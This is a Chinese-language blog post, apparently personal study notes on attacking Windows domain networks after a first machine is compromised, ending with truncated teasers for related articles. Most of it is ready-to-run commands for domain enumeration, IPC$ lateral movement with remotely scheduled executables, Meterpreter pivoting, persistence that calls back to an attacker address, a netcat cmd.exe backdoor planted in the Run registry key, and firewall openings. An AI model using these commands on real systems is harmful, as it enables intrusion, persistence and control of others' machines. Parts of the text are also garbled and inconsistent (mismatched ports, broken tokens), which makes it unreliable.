內網攻擊域滲透學習 筆記

2021-10-09 10:21:46 字數 2349 閱讀 6409

有了內網的第一台機器的許可權後,就到了很關鍵的一步資訊收集,它也是內網滲透中不可或缺的一部分。

檢視當前機器的網路環境,收集域裡的相關資訊,包括所有的使用者、所有的計算機,以及相關關鍵組的資訊。

net user/domain:檢視域使用者

net view/domain:檢視有幾個域

net view/domain:***:檢視域內的主機

net group/domain:檢視域裡面的組

net group "domain computers"

/domain:檢視域內所有的主機名

net group "domain admins"

/domain:檢視域管理員

net group "domain controllers"

/domain:檢視域控制器

net group "enterprise admins"

/domain:檢視企業管理組

nettime/domain:檢視時間伺服器

通過以上可以獲得很多資訊,此時有兩種情況:

當前伺服器可以直接攻擊域伺服器和不可以直接攻擊域伺服器
不可以直接攻擊又分為兩種情況:

如果是許可權不夠就需要提公升許可權,如果是不能連線到域伺服器,則需要攻擊內網中某個可以連線到域伺服器的伺服器,然後以此做為跳板
現在許可權問題不可以直接攻擊域伺服器,可以採取以下方法繼續滲透:

即通過使用windows系統中預設啟動的ipc$共享獲得計算機控制權的入侵,在內網中極其常見。

d:>net use\127.0.0.1\ipc$	連線127.0.0.1的ipc$共享

d:>copy srv.exe\127.0.0.1\ipc$ 複製srv.exe到目標機

d:>net time\127.0.0.1 查時間

d:>at \127.0.0.1 10:50 srv.exe 用at命令在10點50分啟動srv.exe

利用已經被入侵的邊緣機器作為跳板來攻擊網路中的其他機器

訪問由於路由問題而不能直接訪問的內網機器

run autoroute -s 192. 168.102. 0/24

run post/multi/manage/autoroute

掃瞄內網網路:

run post/windows/gather/arp_scanner rhosts = 192.168.102.0/24

use auxiliary/scanner/portscan/tcp

socket**

auxiliary/server/socks4a
proxy chains nmap 掃瞄

metsvc:

通過服務啟動

run metsvc -a #設定埠、上傳後門檔案

persistence:

通過啟動型啟動

特性:定期回連、系統啟動時回連、自動執行

run persistence -a -s -u -i 60 -p 4321 -r 192.168.1.101

nc後門

上傳nc:upload/root/nc.exe c:\\windows\\system32

修改登錄檔

列舉登錄檔鍵值:reg enumkey -k hklm\\software\\microsoft\\windows\\currentversion\\run

在當前主鍵下增加乙個nc鍵值:reg setval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -ldp 444 -e cmd.exe'

檢視nc鍵值:reg queryval -k hklm\\software\\microsoft\\windows\\currentversion\\run -v nc

設定防火牆

開啟乙個cmd的通道

execute -f cmd -i -h

檢視防火牆狀態

netsh firewall show opmode

新增防火牆規則允許444埠通過

netsh firewall add portopening tcp 445 "service firewall" enable

檢視埠狀態

netsh firewall show portopening

開始連線

nc -v ip port

windows內網滲透PTH PTK攻擊

windows內網滲透中,有三種最常用的pass系列攻擊 windows使用者hash主要由以下部分組成,其中ntlm hash比lm hash的安全性要更高 使用者名稱 rid lm hash值 ntlm hash值自windows vista和windows server 2008開始,wind...

域滲透 Kerberoasting攻擊

一 spn介紹 服務主體名稱 spn service principal names 是服務例項,可以將其理解為乙個服務 比如 http mssql 的唯一識別符號,服務在加入域中時是自動註冊的。如果在整個林或域中的計算機上安裝多個服務例項,則每個例項都必須具有自己的 spn。如果客戶端可能使用多個...

內網橫向滲透之PTH攻擊

當我們拿到內網某台作業系統許可權時,如何才能進行有效的橫向滲透操作呢?pth pass the hash 獲取域內單機密碼明文與hash 攻擊者已經獲得了內網某一台主機的控制許可權,利用該機作為跳板機,獲取內網域使用者密碼或者hash值,比如一些橫向移動的方法 雜湊傳遞攻擊 各種票據傳遞 票據許可權...